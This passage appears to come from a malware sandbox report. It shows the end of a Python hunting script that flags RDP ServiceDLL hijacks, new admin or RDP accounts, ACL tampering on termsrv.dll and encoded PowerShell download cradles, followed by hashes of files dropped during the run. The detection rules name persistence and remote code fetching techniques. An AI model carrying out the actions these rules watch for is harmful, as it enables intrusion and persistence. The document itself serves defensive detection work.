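    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def decode_encoded_command(cmdline):
    """Cleartext of a `powershell -enc <base64>` argument (UTF-16LE), or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_reg_add(pid, image, cmdline):
    """TermService ServiceDLL hijack and RDP-Tcp PortNumber changes via reg.exe."""
    m = re.search(r'reg(?:\.exe)?"?\s+add\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    if basename(image) != "reg.exe" or not m:
        return []
    key = (m.group(1) or m.group(2)).lower()
    name = re.search(r"/v\s+(\S+)", cmdline, re.I)
    data = re.search(r"/d\s+(\S+)", cmdline, re.I)
    name, data = (name.group(1).lower() if name else ""), (data.group(1) if data else "")
    out = []
    if key.endswith(r"\services\termservice\parameters") and name == "servicedll" and data.lower() != LEGIT_TERMSRV_DLL:
        out.append((pid, "termservice_servicedll_hijack", data))
    if key.endswith(r"\winstations\rdp-tcp") and name == "portnumber":
        out.append((pid, "rdp_port_changed", str(int(data, 0))))  # reg.exe accepts hex or decimal
    return out


def check_net(pid, image, cmdline):
    """Local admin / Remote Desktop Users membership and new local accounts via net(1).exe."""
    if basename(image) not in ("net.exe", "net1.exe"):
        return []
    t = tokens(cmdline)
    low = [x.lower() for x in t]
    if len(t) < 4 or "/add" not in low:
        return []
    if low[1] == "localgroup" and low[2] == "administrators":
        return [(pid, "local_admin_added", t[3])]
    if low[1] == "localgroup" and low[2] == "remote desktop users":
        return [(pid, "rdp_user_added", t[3])]
    if low[1] == "user":
        return [(pid, "local_user_created", t[2])]
    return []


def check_acl_tamper(pid, image, cmdline):
    """takeown/icacls aimed at the Remote Desktop DLLs."""
    if basename(image) not in ("takeown.exe", "icacls.exe"):
        return []
    m = re.search(r"\b(rfxvmt\.dll|termsrv\.dll)\b", cmdline, re.I)
    return [(pid, "rdp_dll_acl_tamper", m.group(1))] if m else []


def check_encoded_powershell(pid, image, cmdline):
    """Decode -enc payloads and report download cradles with the URL they fetch."""
    if basename(image) != "powershell.exe":
        return []
    clear = decode_encoded_command(cmdline)
    if clear is None:
        return []
    urls = re.findall(r'https?://[^\s"\')]+', clear)
    cradle = re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b", clear, re.I)
    rule = "encoded_download_cradle" if cradle else "encoded_powershell"
    return [(pid, rule, urls[0] if urls else clear[:80])]


def hunt(records):
    """Run every rule over every record; returns (pid, rule, detail) tuples."""
    checks = (check_reg_add, check_net, check_acl_tamper, check_encoded_powershell)
    return [f for rec in records for check in checks for f in check(*rec)]


if __name__ == "__main__":
    print(*hunt(TELEMETRY), sep="\n")
```

Fed real Sysmon or EDR data the same functions take the event's ProcessId, Image and CommandLine fields; the ServiceDLL rule is the highest-fidelity one here, since there is no benign reason for that value to name anything but termsrv.dll, while the net.exe and icacls rules need an allow-list for admin tooling before they are alert-worthy on their own.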
Downloads

PowerShell_AnalysisCacheEntry_* and PowerShell_AnalysisCacheIndex are PowerShell's own module-analysis cache, rewritten whenever PowerShell runs; they are by-products of the scripts executing rather than payloads, so their hashes are not useful indicators.

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1224db42-7593-4e0a-a9dd-53a802380c51
  MD5: 7f79b990cb5ed648f9e583fe35527aa7
  SHA1: 71b177b48c8bd745ef02c2affad79ca222da7c33
  SHA256: 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
  SHA512: 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5bfa02a4-56c4-4b0d-8731-ecaa84524853
  MD5: 6f0d509e28be1af95ba237d4f43adab4
  SHA1: c665febe79e435843553bee86a6cea731ce6c5e4
  SHA256: f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
  SHA512: 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fb426de-7576-4a4f-a8f2-82c2b3d65330
  MD5: e5b3ba61c3cf07deda462c9b27eb4166
  SHA1: b324dad73048be6e27467315f82b7a5c1438a1f9
  SHA256: b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
  SHA512: a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_702a450b-524d-476d-a0bb-2f4bf5d8a799
  MD5: faa37917b36371249ac9fcf93317bf97
  SHA1: a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
  SHA256: b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
  SHA512: 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7404c170-8fc4-4442-b115-3d8f33044de2
  MD5: d89968acfbd0cd60b51df04860d99896
  SHA1: b3c29916ccb81ce98f95bbf3aa8a73de16298b29
  SHA256: 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
  SHA512: b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_89b8b062-b6b0-4fb3-99a9-046a41c0f506
  MD5: a70ee38af4bb2b5ed3eeb7cbd1a12fa3
  SHA1: 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
  SHA256: dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
  SHA512: 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bf82d09d-0553-4157-bcee-c1e6bccab36d
  MD5: 2d5cd190b5db0620cd62e3cd6ba1dcd3
  SHA1: ff4f229f4fbacccdf11d98c04ba756bda80aac7a
  SHA256: ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
  SHA512: edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 3c1dacbf2ce1a12cadb6624682c05a70
  SHA1: 662b1055be72720ff5bbabee29e76999647ec47b
  SHA256: d440269a76eba5f3a0fe80445685fc783c1d76ccc3c8318a94a78d16c9e53eca
  SHA512: f2e321bc780b980b3d8ec19cf4b2b832496a3ff5926dd112f35daf33b8ed3cfc456e1a5787164eb7da641b76c5af73d2e354ece7c1b98e8e6847a6af7287eebf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex (rewritten later in the run)
  MD5: 8c0405f79e2a29e062e070d4da07be69
  SHA1: 53356c43677d98b03decbe894c1dedb5cad4aa77
  SHA256: f45832bb8be3512c7a893a6731fafe6df151773cedef249928386333ea71ed36
  SHA512: 280291c80d1ac371ab697c134dd8fe7a72afc8207ffa675495c1ff73380f25657bae124fdd087ed5711e30610b3a2094ea638cc82ce3c0922e99bba6d82b9741
(path not shown on the page)
  MD5: a7bc8978047c96617c041555d8a17604
  SHA1: e89ea61658c7ea07593b8bece8fb04a3a121ba05
  SHA256: 445c20a73c3ac33c70d40e059613e911e82cc998c74f3c36a675e1cb03cf1d8b
  SHA512: 2f89bdc54f9ce096ca7caf07692522fd7a7e91c53275c3115c3f1f53ae1baba7a7e9b55eaab6a40504795e2ff18fd45d8f54d2ac1a4fdda29a2b19890ef9d8b0

(path not shown on the page)
  MD5: 1caaa54969d3076bea968b8b4dca5c3c
  SHA1: e093d0abe4ac2d0b7c9d0a777adde99067153b06
  SHA256: e449575fde012c46c2513956dc393860149e60be28ca0fa84651c8de22f8462f
  SHA512: dc63ff60a90fcd718986fc89f8721f13ae41207fe759862b9c4b0c1dc668ae861b3f5617233793f767264273ec858dd94e7f375f8032e4eda0c592855e0f0f10

(path not shown on the page)
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

(path not shown on the page)
  MD5: 90c8165a2ca1c584008751e6604aac5f
  SHA1: c1b2545af59ec7acdec29e91c667aa74a12b9742
  SHA256: 2099da06514de677962d66f90b822084878cd4d9bb9e62bfa8c4ed728ddfa974
  SHA512: 9d2e477e0b600ae0d82fac78bdabfdb005033c20e28d7c76fb48111a426e315e9bb7e8da5daeb2824dc92c5e084f52aa33c1d5e680fe566c3f21d96b838799a0
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (listed three times on the page with identical hashes; an Explorer jump-list file, not a payload)
  MD5: d7e64482b71d97c368bdce78ee636c43
  SHA1: 030e27a5cca10901d60234c02dbdee722d02169d
  SHA256: 8062237756a25fea76f1212c872143f31c2e8e6a16e8a0b67a2c3af77902dffb
  SHA512: 3897410e305194044594b21329091248d388eac5c37a1f1434425e6f90aed900307df0c189d37b8ab3a3f5599137c6d572fb98ac19632dd8402c88ee9ab376a6

(path not shown on the page)
  MD5: dc39d23e4c0e681fad7a3e1342a2843c
  SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

(path not shown on the page; five entries on the page carry these hashes, which are the digests of a zero-byte file, so these are empty files rather than dropped code)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

(path not shown on the page)
  MD5: 1cf5f91c4e61122ab89eb8413aefe0c0
  SHA1: 778a9e6fa082bb1df39ffb7aa906eb6366efda2e
  SHA256: ccc56dcb0813869a17a42c2ca262d1c7de89b773d498b6ab69eb8de15c991af5
  SHA512: b7a3e787596c5daf11ecf8d80af5441c4082fc8940973eccdde6c3436ee8eff2e20484c259619c08389a28800865d2ad93adba08c4c3c8e4ad1f73da09a30a2b

(path not shown on the page)
  MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

(path not shown on the page)
  MD5: eb35bcbf52d2a566d4024c8ed0373a6d
  SHA1: 3b594ae69e2a4967fd51034274e4dfa2bdd3ac9d
  SHA256: 487cb491e5217c0e812f1111587d5c1a084ed887d9d8adc5a1fd55e8c7956b63
  SHA512: d4d277c1b00179f5b3ee2b99bc32b506b16c92862d2a2f54ed37968cc77368b8809c4a8c4161d760cca34bbf830b47d72ed95cbd4fec0e558a4120d99409e85b

(path not shown on the page)
  MD5: 615f99f0e93e2cc4c6a3a572835fd63d
  SHA1: c383f93e9a47adc4d4b265fadfcc3feaf0980a91
  SHA256: bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8
  SHA512: dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba

(path not shown on the page)
  MD5: 5b49a655bf1bd6bcb3551bb1cba2a97b
  SHA1: a32f1358093e7e3d8ab6abcc286fc2d92a501f78
  SHA256: 40bbfb4ea867dff557fa9f20ef53d2b31708c847d2c4b601a55f9eabe69c57ca
  SHA512: 7de6b4bbc1bce7c12a6e7d730f62a6ca33106d9088a0d06e9beba0f94cd8e5a5fcc3d22ebfdcc62467e417dc85f909daf8094b69cd905dfff17fe0981ef7858a